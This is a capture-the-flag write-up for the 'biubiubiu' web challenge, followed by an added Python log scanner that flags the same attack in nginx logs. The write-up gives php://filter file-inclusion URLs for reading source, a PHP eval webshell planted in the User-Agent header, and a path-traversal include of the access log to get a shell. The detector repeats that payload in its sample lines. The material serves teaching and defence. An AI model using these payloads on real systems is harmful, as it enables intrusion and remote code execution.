[Web]biubiubiu - jaivy

xp0int Posted on May 7 2018

Use the file inclusion vulnerability to read the source code. The `php://filter/convert.base64-encode` wrapper makes `index.php` return each file base64-encoded instead of executing it:

http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=login.php
http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=conn.php
http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=send.php
http://3b762b3fca0b4a38b5fc27f0911109e278d39450b97f4083.game.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=users.sql

The approach to solving the challenge is to write to the web log and then get a shell through the include. Concretely, a PHP one-line webshell is written into the User-Agent header:

```
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0<?php @eval($_POST['cmd']);?>
```

Then include the log file:

http://3da2fbd6c6394f4e9251b85d50814a0717f9385e66a04deb.game.ichunqiu.com/index.php?page=../../../../../../../var/log/nginx/access.log

Then connect to the database and query it to obtain the flag.

![title](https://leanote.com/api/file/getImage?fileId=5aefff63ab6441023b0010ab)
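A defender's view of the same traffic, as an added example that is not part of the original writeup: the script scans nginx access-log lines for the three request patterns used above (stream wrapper in `page`, traversal to a log file, PHP tag in the User-Agent). The nginx "combined" log format is assumed, and the function names, rule wording and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed nginx "combined" format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$'
)
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)  # php://, data://, ...

def findings(line, param="page"):
    """Return the reasons one access-log line looks like file-inclusion abuse."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    hits = []
    parts = m.group("request").split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    # parse_qs percent-decodes values, so %2e%2e%2f is checked as ../
    for value in parse_qs(target.partition("?")[2]).get(param, []):
        if WRAPPER_RE.match(value):
            hits.append("stream wrapper in include parameter")
        if "../" in value or "..\\" in value:
            hits.append("path traversal in include parameter")
        if "/var/log/" in value or value.lower().endswith(".log"):
            hits.append("log file requested through include parameter")
    if "<?" in m.group("ua"):
        hits.append("PHP open tag in User-Agent")
    return hits

def scan(lines):
    """Map 1-based line number -> findings, for lines with at least one hit."""
    return {n: f for n, line in enumerate(lines, 1) if (f := findings(line))}

# Constructed sample log lines (documentation IPs, made-up times and sizes).
SAMPLE_LOG = '''
203.0.113.7 - - [07/May/2018:10:00:01 +0800] "GET /index.php?page=php://filter/convert.base64-encode/resource=login.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [07/May/2018:10:02:13 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0<?php @eval($_POST['cmd']);?>"
203.0.113.7 - - [07/May/2018:10:02:40 +0800] "GET /index.php?page=../../../../../../../var/log/nginx/access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.4 - - [07/May/2018:10:03:00 +0800] "GET /index.php?page=login HTTP/1.1" 200 640 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

The User-Agent rule fires on the poisoning request itself, before the log is ever included, which makes it the earliest of the three signals.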